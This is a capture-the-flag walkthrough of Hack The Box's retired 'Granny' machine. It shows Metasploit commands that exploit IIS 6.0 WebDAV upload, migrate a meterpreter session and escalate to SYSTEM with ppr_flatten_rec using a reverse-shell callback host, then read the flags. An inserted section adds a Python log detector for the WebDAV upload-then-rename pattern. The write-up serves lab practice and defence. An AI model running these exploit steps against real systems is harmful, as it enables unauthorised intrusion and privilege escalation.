Hello friends!! Today we are going to solve another CTF challenge, “Granny”, which is categorised as a retired lab presented by Hack the Box for online penetration-testing practice. The challenges in this lab are not hard to complete, although they are like brain teasers for beginners as well as for expert penetration testers.
Level: Intermediate
Task: find the user.txt and root.txt files on the victim’s machine.
Since these labs are accessible online, they have static IPs. The IP of Granny is 10.10.10.15, so let’s start with nmap port enumeration.
nmap -A 10.10.10.15
From the image below, you can observe that port 80 is open and Microsoft IIS 6.0 is running on the victim’s machine.
Since port 80 is open on the victim’s machine, we preferred to open its IP in a browser, and the resulting web page is shown below.
Since we know Microsoft IIS httpd 6.0 is running on the victim’s system, I Googled it and found a Rapid7 exploit for it, as highlighted in the image below.
Without wasting time, I opened a new terminal, typed msfconsole to load the Metasploit framework, and used the iis_webdav_upload_asp module to exploit the target system.
use exploit/windows/iis/iis_webdav_upload_asp
msf exploit(windows/iis/iis_webdav_upload_asp) > set rhost 10.10.10.15
msf exploit(windows/iis/iis_webdav_upload_asp) > run
From the image below you can observe that meterpreter session 1 opened, giving us a shell on the victim.
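As an added defensive example that is not part of the original write-up: the iis_webdav_upload_asp module works by uploading a file with a harmless extension over WebDAV PUT and then renaming it to .asp with a MOVE request, so the same activity shows up in the IIS W3C logs as a successful PUT followed by a MOVE of the same resource from one client, usually followed by a GET of the renamed script. The Python script below parses such logs and flags that pattern. It assumes the default IIS 6.0 W3C field order, and the log lines it runs on are constructed for the example, not taken from the lab.

```python
"""Flag WebDAV upload-then-rename activity in IIS 6.0 W3C extended log lines.

Added example for detection, not part of the Granny write-up or of Metasploit.
Assumes the default IIS 6.0 #Fields order; the sample log below is constructed.
"""
from datetime import datetime, timedelta
import posixpath

# Constructed sample log: the client 10.10.14.6 probes WebDAV, PUTs a .txt,
# MOVEs it (IIS does not log the Destination header), then requests the .asp.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2018-05-01 10:00:01 10.10.10.15 GET /iisstart.htm - 80 - 10.10.14.6 Mozilla/5.0 200 0 0
2018-05-01 10:00:05 10.10.10.15 OPTIONS / - 80 - 10.10.14.6 Mozilla/5.0 200 0 0
2018-05-01 10:00:07 10.10.10.15 PROPFIND / - 80 - 10.10.14.6 Mozilla/5.0 207 0 0
2018-05-01 10:00:09 10.10.10.15 PUT /Abc1234.txt - 80 - 10.10.14.6 Mozilla/5.0 201 0 0
2018-05-01 10:00:10 10.10.10.15 MOVE /Abc1234.txt - 80 - 10.10.14.6 Mozilla/5.0 201 0 0
2018-05-01 10:00:12 10.10.10.15 GET /Abc1234.asp - 80 - 10.10.14.6 Mozilla/5.0 200 0 0
2018-05-01 10:05:00 10.10.10.15 GET /pagerror.gif - 80 - 192.168.1.20 Mozilla/5.0 200 0 0
"""

# WebDAV methods that modify content on the server; none should succeed on a
# server that is only meant to serve pages.
WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "MKCOL", "PROPPATCH"}
# Extensions IIS 6.0 hands to the ASP script engine.
SCRIPT_EXTENSIONS = (".asp", ".aspx", ".asa", ".cer", ".cdx")


def parse_w3c(text):
    """Yield one dict per log entry, keyed by the names in the #Fields line."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#"):  # other directives (#Software, #Date, ...)
            continue
        if fields is None:
            raise ValueError("log entry appears before a #Fields header")
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed entry; skip rather than misalign columns
        yield dict(zip(fields, values))


def _stem(uri):
    """'/dir/Abc1234.txt' -> 'Abc1234', used to match a MOVEd file to its new name."""
    return posixpath.splitext(posixpath.basename(uri))[0]


def detect_webdav_upload(text, window=timedelta(seconds=60)):
    """Return findings as (kind, client_ip, method, uri) tuples.

    kinds: 'webdav-write'            any successful write-class method
           'put-then-move'           MOVE of a resource the same client PUT recently
           'uploaded-script-executed' GET of a script whose name matches a moved file
    """
    findings = []
    last_put = {}    # (client, uri)  -> time of successful PUT
    moved = {}       # (client, stem) -> time of PUT-then-MOVE
    for rec in parse_w3c(text):
        method = rec["cs-method"].upper()
        uri = rec["cs-uri-stem"]
        client = rec["c-ip"]
        status = int(rec["sc-status"])
        ts = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        ok = 200 <= status < 300
        if not ok:
            continue  # rejected requests are worth counting elsewhere, not here
        if method in WRITE_METHODS:
            findings.append(("webdav-write", client, method, uri))
        if method == "PUT":
            last_put[(client, uri)] = ts
        elif method == "MOVE":
            put_ts = last_put.get((client, uri))
            if put_ts is not None and ts - put_ts <= window:
                findings.append(("put-then-move", client, "PUT+MOVE", uri))
                moved[(client, _stem(uri))] = ts
        elif method == "GET" and uri.lower().endswith(SCRIPT_EXTENSIONS):
            move_ts = moved.get((client, _stem(uri)))
            if move_ts is not None and ts - move_ts <= window:
                findings.append(("uploaded-script-executed", client, method, uri))
    return findings


if __name__ == "__main__":
    for kind, client, method, uri in detect_webdav_upload(SAMPLE_LOG):
        print(f"{kind:26} {client:15} {method:9} {uri}")
```

The first finding class alone is the useful alert on a production IIS 6.0 host: a successful PUT or MOVE means WebDAV write access is enabled, which is the precondition the module depends on. The PUT→MOVE correlation and the GET of the matching script name are there to raise confidence, since IIS does not log the MOVE Destination header and the new file name has to be inferred from the stem.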
My meterpreter session kept dying, so I went to post-exploitation and migrated the current process into another process by running the following module.
use post/windows/manage/migrate
msf post(windows/manage/migrate) > set session 1
msf post(windows/manage/migrate) > run
The module above migrates a Meterpreter session from one process to another. Either a target PID is given to migrate to, or the module spawns a new process and migrates to that newly spawned process.
Then I ran the post-exploitation module “Multi Recon Local Exploit Suggester”, which suggests local exploits that can be used for further exploitation. The exploits are recommended based on the architecture and platform of the session the user has open, as well as on the exploits available in Metasploit.
use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 1
msf post(multi/recon/local_exploit_suggester) > exploit
Wonderful!! Exploit Suggester truly proved itself by listing the names of other exploits the target is vulnerable to. So now we will go with the last option, as highlighted in the image.
At this point, use the pprFlattenRec Local Privilege Escalation module to get access again, but this time as a privileged user.
use exploit/windows/local/ppr_flatten_rec
msf exploit(windows/local/ppr_flatten_rec) > set session 1
msf exploit(windows/local/ppr_flatten_rec) > set wait 20
msf exploit(windows/local/ppr_flatten_rec) > set lhost 10.10.14.6
msf exploit(windows/local/ppr_flatten_rec) > exploit
Nice!! It works, and we got meterpreter session 2 as the SYSTEM user, as you can check in the image below.
meterpreter > getuid
As we now have a shell with SYSTEM privileges, let’s complete the task by searching for the user.txt and root.txt flags, which are hidden somewhere inside a directory.
meterpreter > ls
Here we found Documents and Settings, so let’s explore it. Inside C:\Documents and Settings\Lakis\Desktop I found the user.txt file and used the type “file name” command to read it.
cd Desktop
type user.txt
Great!! We got our 1st flag successfully.
Inside C:\Documents and Settings\Administrator\Desktop I found the root.txt file and used the type “file name” command to read it.
cd Desktop
type root.txt
Great!! We got our 2nd flag successfully.
Breaching this lab was an interesting and enjoyable moment for me. It takes less time if you are aware of the proper Metasploit exploits, so I will give all the glory to Metasploit for making this challenge easy for me.
Happy Hacking!!